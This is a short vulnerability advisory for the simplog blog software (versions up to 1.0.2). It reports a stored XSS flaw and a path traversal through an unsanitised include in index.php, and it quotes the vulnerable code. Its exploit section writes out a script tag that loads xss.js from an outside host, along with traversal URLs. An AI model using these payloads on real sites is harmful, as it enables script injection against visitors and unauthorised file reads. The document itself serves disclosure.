ORIGIONAL SOURCE: http://notlegal.ws/simplogsploit.txt
???summary
software: simplog
vendors website: http://daverave.64digits.com/home.php?page=simplog
versions: <= 1.0.2
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard and jim
risk level: medium
??? description
simplog does not sanatise blog posts allowing users to insert
html into posts causing a xss vulnerability. also, the application
uses global variables for includes allowing users to include
other .txt files than the inteded target
in index.php:
42 $act = $_GET['act'];
43 if ($act == '')
44 {
45 include("blog.txt");
46 }
47 else
48 {
49 include("act/$act.txt");
50 }
??? exploit(s)
xss:
make any of your blog posts contain a script like below
<SCRIPT SRC=http://notlegal.ws/xss.js></SCRIPT>
directory transversal:
http://example.com/index.php?act=blog&blogid=../somefile
http://example.com/index.php?act=../somefile
??? credit
author(s): retard and jim
email: retard (at) 30gigs (dot) com [email concealed]